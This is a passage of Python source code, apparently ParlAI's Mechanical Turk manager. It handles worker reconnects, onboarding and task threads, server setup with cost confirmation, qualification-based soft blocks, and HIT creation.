'text': data_model.COMMAND_RESTORE_STATE,
'messages': agent.get_messages(),
'last_command': agent.get_last_command(),
}
self.send_command(worker_id, assignment_id, data)
if agent.message_request_time is not None:
agent.request_message()
state_thread = threading.Thread(
name='restore-agent-{}'.format(agent.worker_id),
target=send_state_data)
state_thread.daemon = True
state_thread.start()
# Return an agent to their conversation, then restore the state
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=agent.conversation_id,
new_agent_id=agent.id,
)
def _setup_socket(self, timeout_seconds=None):
"""Set up a socket_manager with defined callbacks"""
assert self.task_state >= self.STATE_INIT_RUN, \
'socket cannot be set up until run is started'
socket_server_url = self.server_url
if (self.opt['local']): # skip some hops for local stuff
socket_server_url = "https://localhost"
self.socket_manager = SocketManager(
socket_server_url,
self.port,
self._on_alive,
self._on_new_message,
self._on_socket_dead,
self.task_group_id,
socket_dead_timeout=timeout_seconds,
server_death_callback=self.shutdown,
)
def _on_alive(self, pkt):
"""Update MTurkManager's state when a worker sends an
alive packet. This asks the socket manager to open a new channel and
then handles ensuring the worker state is consistent
"""
shared_utils.print_and_log(
logging.DEBUG,
'on_agent_alive: {}'.format(pkt)
)
worker_id = pkt.data['worker_id']
hit_id = pkt.data['hit_id']
assign_id = pkt.data['assignment_id']
conversation_id = pkt.data['conversation_id']
if not assign_id:
# invalid assignment_id is an auto-fail
shared_utils.print_and_log(
logging.WARN,
'Agent ({}) with no assign_id called alive'.format(worker_id)
)
return
# Open a channel if it doesn't already exist
self.socket_manager.open_channel(worker_id, assign_id)
# Get a state for this worker, create if non existing
worker_state = self.worker_manager.worker_alive(worker_id)
if self.db_logger is not None:
self.db_logger.log_worker_note(
worker_id, assign_id,
'Reconnected with conversation_id {} at {}'.format(
conversation_id, time.time()))
if not worker_state.has_assignment(assign_id):
# New connection for the worker. First ensure that this connection
# isn't violating our uniqueness constraints
completed_assignments = worker_state.completed_assignments()
max_hits = self.max_hits_per_worker
if ((self.is_unique and completed_assignments > 0) or
(max_hits != 0 and completed_assignments > max_hits)):
text = (
'You have already participated in this HIT the maximum '
'number of times. This HIT is now expired. '
'Please return the HIT.'
)
self.force_expire_hit(worker_id, assign_id, text)
return
# Ensure we are still accepting workers
if not self.accepting_workers:
self.force_expire_hit(worker_id, assign_id)
return
# Ensure worker has not exceeded concurrent convo cap
convs = worker_state.active_conversation_count()
allowed_convs = self.opt['allowed_conversations']
if allowed_convs > 0 and convs >= allowed_convs:
text = ('You can participate in only {} of these HITs at '
'once. Please return this HIT and finish your '
'existing HITs before accepting more.'.format(
allowed_convs
))
self.force_expire_hit(worker_id, assign_id, text)
return
# Initialize a new agent for this worker
self.worker_manager.assign_task_to_worker(
hit_id, assign_id, worker_id
)
if self.db_logger is not None:
self.db_logger.log_worker_accept_assignment(
worker_id, assign_id, hit_id)
agent = self.worker_manager._get_agent(worker_id, assign_id)
self._onboard_new_agent(agent)
else:
# Reconnecting worker
agent = self.worker_manager._get_agent(worker_id, assign_id)
agent.log_reconnect()
agent.alived = True
conversation_id = agent.conversation_id
if agent.get_status() == AssignState.STATUS_NONE:
# See if assigned an onboarding world, update state if so
if self.is_onboarding_world(conversation_id):
agent.set_status(AssignState.STATUS_ONBOARDING)
return
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting before even being given a world. Kill the hit
# so that on a reconnect they can get a new one assigned and
# the resources of the first one are cleaned.
self.force_expire_hit(worker_id, assign_id)
return
elif agent.get_status() == AssignState.STATUS_ONBOARDING:
# See if moved to a waiting world, update state if so
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting to the onboarding world should either restore
# state or expire (if workers are no longer being accepted
# for this task)
if not self.accepting_workers:
self.force_expire_hit(worker_id, assign_id)
elif not conversation_id:
self._restore_agent_state(worker_id, assign_id)
elif agent.get_status() == AssignState.STATUS_WAITING:
if self.is_task_world(conversation_id):
agent.set_status(AssignState.STATUS_IN_TASK)
agent.clear_messages()
return
# Reconnecting in waiting is either the first reconnect after
# being told to wait or a waiting reconnect. Restore state if
# no information is held, and add to the pool if not already in
# the pool
if not conversation_id:
self._restore_agent_state(worker_id, assign_id)
self._add_agent_to_pool(agent)
elif agent.get_status() == AssignState.STATUS_IN_TASK:
if self.is_waiting_world(conversation_id):
agent.set_status(AssignState.STATUS_WAITING)
self._add_agent_to_pool(agent)
return
# Reconnecting to the onboarding world or to a task world
# should resend the messages already in the conversation
if not conversation_id:
self._restore_agent_state(worker_id, assign_id)
elif (agent.get_status() == AssignState.STATUS_DISCONNECT or
agent.get_status() == AssignState.STATUS_DONE or
agent.get_status() == AssignState.STATUS_EXPIRED or
agent.get_status() == AssignState.STATUS_RETURNED or
agent.get_status() == AssignState.STATUS_PARTNER_DISCONNECT):
# inform the connecting user in all of these cases that the
# task is no longer workable, use appropriate message
data = agent.get_inactive_command_data()
def disconnect_agent(*args):
self.socket_manager.close_channel(
agent.get_connection_id())
self.send_command(worker_id, assign_id, data,
ack_func=disconnect_agent)
def _handle_mturk_message(self, pkt):
assignment_id = pkt.assignment_id
agent = self.worker_manager.get_agent_for_assignment(assignment_id)
if agent is None:
return
mturk_event_type = pkt.data['text']
if mturk_event_type == SNS_ASSIGN_RETURNED:
agent.hit_is_returned = True
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_ABANDONDED:
agent.set_hit_is_abandoned()
# Treat as a socket_dead event
self._on_socket_dead(agent.worker_id, assignment_id)
elif mturk_event_type == SNS_ASSIGN_SUBMITTED:
# Socket dead already called, just mark as complete
agent.hit_is_complete = True
def _on_new_message(self, pkt):
"""Handle incoming messages from Amazon's SNS queue. All other packets
should be handled by the worker_manager
"""
if pkt.sender_id == AMAZON_SNS_NAME:
self._handle_mturk_message(pkt)
return
self.worker_manager.route_packet(pkt)
def _on_socket_dead(self, worker_id, assignment_id):
"""Handle a disconnect event, update state as required and notifying
other agents if the disconnected agent was in conversation with them
returns False if the socket death should be ignored and the socket
should stay open and not be considered disconnected
"""
agent = self.worker_manager._get_agent(worker_id, assignment_id)
if agent is None:
# This worker never registered, so we don't do anything
return
shared_utils.print_and_log(
logging.DEBUG,
'Worker {} disconnected from {} in status {}'.format(
worker_id,
agent.conversation_id,
agent.get_status()
)
)
if agent.get_status() == AssignState.STATUS_NONE:
# Agent never made it to onboarding, delete
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
elif agent.get_status() == AssignState.STATUS_ONBOARDING:
# Agent never made it to task pool, the onboarding thread will die
# and delete the agent if we mark it as a disconnect
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_WAITING:
# agent is in pool, remove from pool and delete
if agent in self.agent_pool:
with self.agent_pool_change_condition:
self._remove_from_agent_pool(agent)
agent.set_status(AssignState.STATUS_DISCONNECT)
agent.reduce_state()
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_IN_TASK:
self._handle_agent_disconnect(worker_id, assignment_id)
agent.disconnected = True
elif agent.get_status() == AssignState.STATUS_DONE:
# It's okay if a complete assignment socket dies, but wait for the
# world to clean up the resource
return
self.socket_manager.close_channel(agent.get_connection_id())
def _onboard_new_agent(self, mturk_agent):
"""Handle creating an onboarding thread and moving an agent through
the onboarding process, updating the state properly along the way
Returns True if a thread is launched, False if the call is ignored.
"""
# get state variable in question
worker_id = mturk_agent.worker_id
assignment_id = mturk_agent.assignment_id
def _onboard_function(mturk_agent):
"""Onboarding wrapper to set state to onboarding properly"""
if self.onboard_function:
conversation_id = 'o_' + str(uuid.uuid4())
self.worker_manager.change_agent_conversation(
agent=mturk_agent,
conversation_id=conversation_id,
new_agent_id='onboarding',
)
# Wait for turker to be in onboarding status
did_arrive = \
mturk_agent.wait_for_status(AssignState.STATUS_ONBOARDING)
if not did_arrive:
return
# call onboarding function
save_data = self.onboard_function(mturk_agent)
if save_data is not None:
MTurkDataHandler.save_world_data(
save_data, self.task_group_id,
conversation_id, sandbox=self.is_sandbox)
# once onboarding is done, move into a waiting world
self._move_agents_to_waiting([mturk_agent])
if assignment_id in self.assignment_to_onboard_thread:
if self.assignment_to_onboard_thread[assignment_id].isAlive():
return False
agent = self.worker_manager.get_agent_for_assignment(assignment_id)
# Only start an onboarding world if the worker never got a world
if agent.get_status() != AssignState.STATUS_NONE:
return False
# Start the onboarding thread and run it
onboard_thread = threading.Thread(
target=_onboard_function,
args=(mturk_agent,),
name='onboard-{}-{}'.format(worker_id, assignment_id)
)
onboard_thread.daemon = True
onboard_thread.start()
self.assignment_to_onboard_thread[assignment_id] = onboard_thread
return True
def _no_agents_incomplete(self, agents):
"""Return True if all the given agents completed their task"""
for agent in agents:
if not agent.is_final() or agent.get_status() != \
AssignState.STATUS_DONE:
return False
return True
def _check_time_limit(self):
if time.time() - self.time_limit_checked < RESET_TIME_LOG_TIMEOUT:
return
if int(time.time()) % (60 * 60 * 24) > (60 * 30):
# sync the time resets to ONCE DAILY in a 30 minute window
return
self.time_limit_checked = time.time()
self._reset_time_logs()
self.worker_manager.un_time_block_workers()
def is_onboarding_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('o_')
def is_waiting_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('w_')
def is_task_world(self, conversation_id):
return conversation_id is not None and conversation_id.startswith('t_')
# Manager Lifecycle Functions #
def populate_legacy_task_files(self, task_directory_path):
# Poplulate files to copy over to the server
if not self.task_files_to_copy:
self.task_files_to_copy = []
if not task_directory_path:
task_directory_path = os.path.join(
self.opt['parlai_home'],
'parlai',
'mturk',
'tasks',
self.opt['task']
)
self.task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
try:
for file_name in os.listdir(os.path.join(
task_directory_path, 'html')):
self.task_files_to_copy.append(os.path.join(
task_directory_path, 'html', file_name
))
except FileNotFoundError: # noqa F821 we don't support python2
# No html dir exists
pass
for mturk_agent_id in self.mturk_agent_ids + ['onboarding']:
self.task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
def populate_task_files(self, task_directory_path):
# Poplulate files to copy over to the server
if not self.task_files_to_copy:
self.task_files_to_copy = {
'static': [],
'components': [],
'css': [],
'needs_build': None,
}
if not task_directory_path:
task_directory_path = os.path.join(
self.opt['parlai_home'],
'parlai',
'mturk',
'tasks',
self.opt['task']
)
self.task_files_to_copy['static'].append(os.path.join(
task_directory_path, 'frontend', 'static', 'cover_page.html'))
try:
frontend_contents = os.listdir(
os.path.join(task_directory_path, 'frontend'))
if 'package.json' in frontend_contents:
# We take a package file to mean that this component will
# need to be built separately before importing
self.task_files_to_copy['needs_build'] = \
os.path.join(task_directory_path, 'frontend')
for dir in frontend_contents:
if dir in self.task_files_to_copy:
for file_name in os.listdir(os.path.join(
task_directory_path, 'frontend', dir)):
self.task_files_to_copy[dir].append(os.path.join(
task_directory_path, 'frontend', dir, file_name
))
except FileNotFoundError: # noqa F821 we don't support python2
# No frontend dir exists
pass
def setup_server(self, task_directory_path=None):
"""Prepare the MTurk server for the new HIT we would like to submit"""
assert self.task_state >= self.STATE_CREATED
fin_word = 'start'
if self.opt['count_complete']:
fin_word = 'finish'
shared_utils.print_and_log(
logging.INFO,
'\nYou are going to allow workers from Amazon Mechanical Turk to '
'be an agent in ParlAI.\nDuring this process, Internet connection '
'is required, and you should turn off your computer\'s auto-sleep '
'feature.',
should_print=True,
)
if self.opt['max_connections'] == 0:
shared_utils.print_and_log(
logging.INFO,
'Enough HITs will be created to fulfill {} times the '
'number of conversations requested, extra HITs will be expired'
' once the desired conversations {}.'
''.format(HIT_MULT, fin_word),
should_print=True,
)
else:
shared_utils.print_and_log(
logging.INFO,
'Enough HITs will be launched over time '
'up to a max of {} times the amount requested until the '
'desired number of conversations {}.'
''.format(HIT_MULT, fin_word),
should_print=True,
)
input('Please press Enter to continue... ')
shared_utils.print_and_log(logging.NOTSET, '', True)
if self.opt['local'] is True:
shared_utils.print_and_log(
logging.INFO,
"In order to run the server locally, you will need "
"to have a public HTTPS endpoint (SSL signed) running on "
"the server you are currently excecuting ParlAI on. Enter "
"that public URL hostname when prompted and ensure that the "
"port being used by ParlAI (usually 3000) has external "
"traffic routed to it.",
should_print=True,
)
input('Please press Enter to continue... ')
mturk_utils.setup_aws_credentials()
# See if there's enough money in the account to fund the HITs requested
num_assignments = self.required_hits
payment_opt = {
'type': 'reward',
'num_total_assignments': num_assignments,
'reward': self.opt['reward'], # in dollars
}
total_cost = mturk_utils.calculate_mturk_cost(payment_opt=payment_opt)
if not mturk_utils.check_mturk_balance(
balance_needed=total_cost,
is_sandbox=self.opt['is_sandbox']):
raise SystemExit('Insufficient funds')
if ((not self.opt['is_sandbox']) and
(total_cost > 100 or self.opt['reward'] > 1)):
confirm_string = '$%.2f' % total_cost
expected_cost = total_cost / HIT_MULT
expected_string = '$%.2f' % expected_cost
shared_utils.print_and_log(
logging.INFO,
'You are going to create {} HITs at {} per assignment, for a '
'total cost up to {} after MTurk fees. Please enter "{}" to '
'confirm and continue, and anything else to cancel.\nNote that'
' of the {}, the target amount to spend is {}.'.format(
self.required_hits,
'$%.2f' % self.opt['reward'],
confirm_string,
confirm_string,
confirm_string,
expected_string
),
should_print=True
)
check = input('Enter here: ')
if (check != confirm_string and ('$' + check) != confirm_string):
raise SystemExit('Cancelling')
# Check to see if there are any additional notices on the parlai site
if not self.is_test:
shared_utils.print_and_log(
logging.INFO,
'Querying the parlai website for possible notices...',
should_print=True)
endpoint = 'sandbox' if self.is_sandbox else 'live'
notice_url = PARLAI_MTURK_NOTICE_URL + endpoint
try:
import parlai_internal.mturk.configs as local_configs
notice_url = local_configs.get_true_url(notice_url)
except Exception:
# not all users will be drawing configs from internal settings
pass
resp = requests.post(notice_url)
warnings = resp.json()
for warn in warnings:
print('Notice: ' + warn)
accept = input('Continue? (Y/n): ')
if accept == 'n':
raise SystemExit('Additional notice was rejected.')
self.logging_permitted = self._logging_permission_check()
shared_utils.print_and_log(logging.INFO, 'Setting up MTurk server...',
should_print=True)
self.is_unique = self.opt['unique_worker']
self.max_hits_per_worker = self.opt.get('max_hits_per_worker', 0)
mturk_utils.create_hit_config(
opt=self.opt,
task_description=self.opt['task_description'],
unique_worker=self.is_unique,
is_sandbox=self.opt['is_sandbox']
)
# Setup the server with a likely-unique app-name
task_name = '{}-{}'.format(str(uuid.uuid4())[:8], self.opt['task'])
self.server_task_name = \
''.join(e for e in task_name.lower() if e.isalnum() or e == '-')
if 'heroku_team' in self.opt:
heroku_team = self.opt['heroku_team']
else:
heroku_team = None
if self.opt.get('frontend_version', 0) < 1:
self.populate_legacy_task_files(task_directory_path)
self.server_url = server_utils.setup_legacy_server(
self.server_task_name, self.task_files_to_copy,
self.opt['local'], heroku_team, self.opt['hobby'])
else:
self.populate_task_files(task_directory_path)
self.server_url = server_utils.setup_server(
self.server_task_name, self.task_files_to_copy,
self.opt['local'], heroku_team, self.opt['hobby'])
shared_utils.print_and_log(logging.INFO, self.server_url)
shared_utils.print_and_log(logging.INFO, "MTurk server setup done.\n",
should_print=True)
self.task_state = self.STATE_SERVER_ALIVE
def start_new_run(self):
"""Clear state to prepare for a new run"""
assert self.task_state >= self.STATE_SERVER_ALIVE, \
'Cannot start a run before having a running server using ' \
'`mturk_manager.setup_server()` first.'
self.run_id = str(int(time.time()))
self.task_group_id = '{}_{}'.format(self.opt['task'], self.run_id)
self._init_state()
try:
self.topic_arn = mturk_utils.setup_sns_topic(
self.opt['task'],
self.server_url,
self.task_group_id
)
except Exception:
self.topic_arn = None
shared_utils.print_and_log(
logging.WARN,
'Botocore couldn\'t subscribe to HIT events, '
'perhaps you tried to register to localhost?',
should_print=True
)
if self.db_logger is not None:
self.db_logger.log_new_run(self.required_hits, self.opt['task'])
self.task_state = self.STATE_INIT_RUN
def ready_to_accept_workers(self, timeout_seconds=None):
"""Set up socket to start communicating to workers"""
assert self.task_state >= self.STATE_INIT_RUN, \
'Cannot be ready to accept workers before starting a run with ' \
'`mturk_manager.start_new_run()` first.'
shared_utils.print_and_log(logging.INFO,
'Local: Setting up WebSocket...',
not self.is_test)
self._setup_socket(timeout_seconds=timeout_seconds)
shared_utils.print_and_log(logging.INFO, 'WebSocket set up!',
should_print=True)
# Just in case create_hits was called first. To be removed when that
# workflow is no longer supported
if self.STATE_ACCEPTING_WORKERS > self.task_state:
self.task_state = self.STATE_ACCEPTING_WORKERS
def set_onboard_function(self, onboard_function):
self.onboard_function = onboard_function
def start_task(self, eligibility_function, assign_role_function,
task_function):
"""Handle running a task by checking to see when enough agents are
in the pool to start an instance of the task. Continue doing this
until the desired number of conversations is had.
"""
assert self.task_state >= self.STATE_HITS_MADE, \
'Must have launched HITs with `mturk_manager.create_hits`' \
' to start the task'
if callable(eligibility_function):
# Convert legacy eligibility_functions to the new format
eligibility_function = {
'multiple': False,
'func': eligibility_function,
}
else:
# Ensure the eligibility function is valid
if 'func' not in eligibility_function:
shared_utils.print_and_log(
logging.CRITICAL,
"eligibility_function has no 'func'. Cancelling."
)
raise Exception(
'eligibility_function dict must contain a `func` field '
'containing the actual function.'
)
elif not callable(eligibility_function['func']):
shared_utils.print_and_log(
logging.CRITICAL,
"eligibility_function['func'] not a function. Cancelling."
)
raise Exception(
"eligibility_function['func'] must contain a function. "
"If eligibility_function['multiple'] is set, it should "
"filter through the list of workers and only return those "
"that are currently eligible to participate. If it is not "
"set, it should take in a single worker and return whether"
" or not they are eligible."
)
if 'multiple' not in eligibility_function:
eligibility_function['multiple'] = False
def _task_function(opt, agents, conversation_id):
"""Wait for agents to join the world, then run task function"""
shared_utils.print_and_log(
logging.INFO,
'Starting task {}...'.format(conversation_id)
)
shared_utils.print_and_log(
logging.DEBUG,
'Waiting for all agents to join the conversation...'
)
start_time = time.time()
while True:
all_joined = True
for agent in agents:
# check the status of an individual agent assignment
if agent.get_status() != AssignState.STATUS_IN_TASK:
all_joined = False
if all_joined:
break
if time.time() - start_time > WORLD_START_TIMEOUT:
# We waited but not all agents rejoined, throw agents
# back into the waiting pool. Stragglers will disconnect
# from there
shared_utils.print_and_log(
logging.INFO,
'Timeout waiting for {}, move back to waiting'.format(
conversation_id
)
)
self._move_agents_to_waiting(agents)
return
time.sleep(shared_utils.THREAD_SHORT_SLEEP)
shared_utils.print_and_log(
logging.INFO,
'All agents joined the conversation {}!'.format(
conversation_id
)
)
self.started_conversations += 1
save_data = \
task_function(mturk_manager=self, opt=opt, workers=agents)
if save_data is not None:
MTurkDataHandler.save_world_data(
save_data, self.task_group_id, conversation_id,
sandbox=self.is_sandbox)
# Delete extra state data that is now unneeded
for agent in agents:
agent.clear_messages()
# Count if it's a completed conversation
if self._no_agents_incomplete(agents):
self.completed_conversations += 1
if self.opt['max_connections'] > 0: # If using a conv cap
if self.accepting_workers: # if still looking for new agents
for agent in agents:
if agent.submitted_hit():
self.create_additional_hits(1)
if self.db_logger is not None:
self._maintain_hit_status()
while not self.is_shutdown:
if self.has_time_limit:
self._check_time_limit()
# Loop forever starting task worlds until desired convos are had
with self.agent_pool_change_condition:
valid_agents = self._get_unique_pool(eligibility_function)
needed_agents = len(self.mturk_agent_ids)
if len(valid_agents) >= needed_agents:
# enough agents in pool to start new conversation
self.conversation_index += 1
new_conversation_id = \
't_{}'.format(self.conversation_index)
# Add the required number of valid agents to the conv
agents = [a for a in valid_agents[:needed_agents]]
assign_role_function(agents)
# Allow task creator to filter out agents and run
# versions of the task that require fewer agents
agents = [a for a in agents if a.id is not None]
for agent in agents:
self.worker_manager.change_agent_conversation(
agent=agent,
conversation_id=new_conversation_id,
new_agent_id=agent.id,
)
# Remove selected agents from the pool
self._remove_from_agent_pool(agent)
# Start a new thread for this task world
task_thread = threading.Thread(
target=_task_function,
args=(self.opt, agents, new_conversation_id),
name='task-{}'.format(new_conversation_id)
)
task_thread.daemon = True
task_thread.start()
self.task_threads.append(task_thread)
# Once we've had enough conversations, finish and break
compare_count = self.started_conversations
if (self.opt['count_complete']):
compare_count = self.completed_conversations
if compare_count >= self.num_conversations:
self.accepting_workers = False
self.expire_all_unassigned_hits()
self._expire_onboarding_pool()
self._expire_agent_pool()
# Wait for all conversations to finish, then break from
# the while loop
for thread in self.task_threads:
thread.join()
break
time.sleep(shared_utils.THREAD_MEDIUM_SLEEP)
def _wait_for_task_expirations(self):
"""Wait for the full task duration to ensure anyone who sees the task
has it expired, and ensures that all tasks are properly expired
"""
start_time = time.time()
min_wait = self.opt['assignment_duration_in_seconds']
while time.time() - start_time < min_wait and \
len(self.hit_id_list) > 0:
self.expire_all_unassigned_hits()
time.sleep(
max(self.opt['assignment_duration_in_seconds'] / 60, 0.1)
)
def shutdown(self, force=False):
"""Handle any mturk client shutdown cleanup."""
# Ensure all threads are cleaned and state and HITs are handled
if self.is_shutdown and not force:
return
self.is_shutdown = True
try:
self.expire_all_unassigned_hits()
self._expire_onboarding_pool()
self._expire_agent_pool()
self._wait_for_task_expirations()
for assignment_id in self.assignment_to_onboard_thread:
self.assignment_to_onboard_thread[assignment_id].join()
except BaseException:
pass
finally:
if self.server_task_name is not None:
server_utils.delete_server(self.server_task_name,
self.opt['local'])
if self.topic_arn is not None:
mturk_utils.delete_sns_topic(self.topic_arn)
if self.opt['unique_worker'] and not self.opt['unique_qual_name']:
mturk_utils.delete_qualification(self.unique_qual_id,
self.is_sandbox)
if self.socket_manager is not None:
self.socket_manager.shutdown()
if self.logging_permitted and not self.is_sandbox and \
not self.is_test:
self._upload_worker_data()
if self.worker_manager is not None:
self.worker_manager.shutdown()
# MTurk Agent Interaction Functions #
def force_expire_hit(self, worker_id, assign_id, text=None, ack_func=None):
"""Send a command to expire a hit to the provided agent, update State
to reflect that the HIT is now expired
"""
# Expire in the state
agent = self.worker_manager._get_agent(worker_id, assign_id)
if agent is not None:
if agent.is_final():
return
agent.set_status(AssignState.STATUS_EXPIRED)
agent.hit_is_expired = True
if ack_func is None:
def use_ack_func(*args):
self.socket_manager.close_channel(
'{}_{}'.format(worker_id, assign_id))
else:
def use_ack_func(*args):
ack_func(*args)
self.socket_manager.close_channel(
'{}_{}'.format(worker_id, assign_id))
# Send the expiration command
if text is None:
text = ('This HIT is expired, please return and take a new '
'one if you\'d want to work on this task.')
data = {'text': data_model.COMMAND_EXPIRE_HIT, 'inactive_text': text}
self.send_command(worker_id, assign_id, data, ack_func=use_ack_func)
def handle_turker_timeout(self, worker_id, assign_id):
"""To be used by the MTurk agent when the worker doesn't send a message
within the expected window.
"""
# Expire the hit for the disconnected user
text = ('You haven\'t entered a message in too long. As these HITs '
' often require real-time interaction, this hit has '
'been expired and you have been considered disconnected. '
'Disconnect too frequently and you will be blocked from '
'working on these HITs in the future.')
self.force_expire_hit(worker_id, assign_id, text)
# Send the disconnect event to all workers in the convo
self._handle_agent_disconnect(worker_id, assign_id)
def send_message(self, receiver_id, assignment_id, data,
blocking=True, ack_func=None):
"""Send a message through the socket manager,
update conversation state
"""
data = data.copy() # Ensure data packet is sent in current state
data['type'] = data_model.MESSAGE_TYPE_MESSAGE
# Force messages to have a unique ID
if 'message_id' not in data:
data['message_id'] = str(uuid.uuid4())
conversation_id = None
agent = self.worker_manager._get_agent(receiver_id, assignment_id)
if agent is not None:
conversation_id = agent.conversation_id
event_id = shared_utils.generate_event_id(receiver_id)
packet = Packet(
event_id,
Packet.TYPE_MESSAGE,
self.socket_manager.get_my_sender_id(),
receiver_id,
assignment_id,
data,
conversation_id=conversation_id,
blocking=blocking,
ack_func=ack_func
)
shared_utils.print_and_log(
logging.INFO,
'Manager sending: {}'.format(packet),
should_print=self.opt['verbose']
)
# Push outgoing message to the message thread to be able to resend
# on a reconnect event
if agent is not None:
agent.append_message(packet.data)
self.socket_manager.queue_packet(packet)
return data['message_id']
def send_command(self, receiver_id, assignment_id, data, blocking=True,
ack_func=None):
"""Sends a command through the socket manager,
update conversation state
"""
data['type'] = data_model.MESSAGE_TYPE_COMMAND
event_id = shared_utils.generate_event_id(receiver_id)
packet = Packet(
event_id,
Packet.TYPE_MESSAGE,
self.socket_manager.get_my_sender_id(),
receiver_id,
assignment_id,
data,
blocking=blocking,
ack_func=ack_func
)
agent = self.worker_manager._get_agent(receiver_id, assignment_id)
if (data['text'] != data_model.COMMAND_CHANGE_CONVERSATION and
data['text'] != data_model.COMMAND_RESTORE_STATE and
agent is not None):
# Append last command, as it might be necessary to restore state
agent.set_last_command(packet.data)
self.socket_manager.queue_packet(packet)
def mark_workers_done(self, workers):
"""Mark a group of agents as done to keep state consistent"""
for agent in workers:
if self.is_unique:
assert self.unique_qual_name is not None, \
'Unique qual name must not be none to use is_unique'
self.give_worker_qualification(
agent.worker_id,
self.unique_qual_name,
)
if not agent.is_final():
agent.set_status(AssignState.STATUS_DONE)
if self.max_hits_per_worker > 0:
worker_state = self.worker_manager._get_worker(agent.worker_id)
completed_assignments = worker_state.completed_assignments()
assert self.unique_qual_name is not None, 'Unique qual name ' \
'must not be none to use max_hits_per_worker'
if completed_assignments >= self.max_hits_per_worker:
self.give_worker_qualification(
agent.worker_id,
self.unique_qual_name,
)
if self.has_time_limit:
self._log_working_time(agent)
def free_workers(self, workers):
"""End completed worker threads"""
for agent in workers:
self.socket_manager.close_channel(agent.get_connection_id())
# Amazon MTurk Server Functions #
def get_agent_work_status(self, assignment_id):
return self.worker_manager.get_agent_work_status(assignment_id)
def get_qualification_list(self, qualifications=None):
if self.qualifications is not None:
return self.qualifications.copy()
if qualifications is None:
qualifications = []
if not self.is_sandbox and not self.is_test:
try:
import parlai_internal.mturk.configs as local_configs
qualifications = \
local_configs.set_default_qualifications(qualifications)
except Exception:
# not all users will be drawing configs from internal settings
pass
if self.opt['disconnect_qualification'] is not None:
block_qual_id = mturk_utils.find_or_create_qualification(
self.opt['disconnect_qualification'],
'A soft ban from using a ParlAI-created HIT due to frequent '
'disconnects from conversations, leading to negative '
'experiences for other Turkers and for the requester.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as disconnect qualification could '
'not be acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
# Add the soft block qualification if it has been specified
if self.opt['block_qualification'] is not None:
block_qual_id = mturk_utils.find_or_create_qualification(
self.opt['block_qualification'],
'A soft ban from this ParlAI-created HIT at the requesters '
'discretion. Generally used to restrict how frequently a '
'particular worker can work on a particular task.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as block qualification could not be'
' acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
if self.has_time_limit:
block_qual_name = '{}-max-daily-time'.format(self.task_group_id)
if self.opt['max_time_qual'] is not None:
block_qual_name = self.opt['max_time_qual']
self.max_time_qual = block_qual_name
block_qual_id = mturk_utils.find_or_create_qualification(
block_qual_name,
'A soft ban from working on this HIT or HITs by this '
'requester based on a maximum amount of daily work time set '
'by the requester.',
self.is_sandbox,
)
assert block_qual_id is not None, (
'Hits could not be created as a time block qualification could'
' not be acquired. Shutting down server.'
)
qualifications.append({
'QualificationTypeId': block_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
if self.is_unique or self.max_hits_per_worker > 0:
self.unique_qual_name = self.opt.get('unique_qual_name')
if self.unique_qual_name is None:
self.unique_qual_name = self.task_group_id + '_max_submissions'
self.unique_qual_id = mturk_utils.find_or_create_qualification(
self.unique_qual_name,
'Prevents workers from completing a task too frequently',
self.is_sandbox,
)
qualifications.append({
'QualificationTypeId': self.unique_qual_id,
'Comparator': 'DoesNotExist',
'ActionsGuarded': 'DiscoverPreviewAndAccept'
})
self.qualifications = qualifications
return qualifications.copy()
def create_additional_hits(self, num_hits, qualifications=None):
"""Handle creation for a specific number of hits/assignments
Put created HIT ids into the hit_id_list
"""
shared_utils.print_and_log(logging.INFO,
'Creating {} hits...'.format(num_hits))
qualifications = self.get_qualification_list(qualifications)
self.opt['assignment_duration_in_seconds'] = self.opt.get(
'assignment_duration_in_seconds', 30 * 60)
hit_type_id = mturk_utils.create_hit_type(
hit_title=self.opt['hit_title'],
hit_description='{} (ID: {})'.format(self.opt['hit_description'],
self.task_group_id),
hit_keywords=self.opt['hit_keywords'],
hit_reward=self.opt['reward'],
# Set to 30 minutes by default
assignment_duration_in_seconds=self.opt.get(
'assignment_duration_in_seconds', 30 * 60),
is_sandbox=self.opt['is_sandbox'],
qualifications=qualifications,
auto_approve_delay=self.auto_approve_delay,
)
mturk_chat_url = '{}/chat_index?task_group_id={}'.format(
self.server_url,
self.task_group_id
)
shared_utils.print_and_log(logging.INFO, mturk_chat_url)
mturk_page_url = None
if self.topic_arn is not None:
mturk_utils.subscribe_to_hits(
hit_type_id,
self.is_sandbox,
self.topic_arn
)
for _i in range(num_hits):
mturk_page_url, hit_id, mturk_response = \
mturk_utils.create_hit_with_hit_type(
opt=self.opt,
page_url=mturk_chat_url,
hit_type_id=hit_type_id,
num_assignments=1,
is_sandbox=self.is_sandbox
)
if self.db_logger is not None:
self.db_logger.log_hit_status(mturk_response)
self.hit_id_list.append(hit_id)
return mturk_page_url
def create_hits(self, qualifications=None):
"""Create hits based on the managers current config, return hit url"""
shared_utils.print_and_log(logging.INFO, 'Creating HITs...', True)
if self.task_state < self.STATE_ACCEPTING_WORKERS:
shared_utils.print_and_log(
logging.WARN,
'You should be calling `ready_to_accept_workers` before '
'`create_hits` to ensure that the socket is connected before'
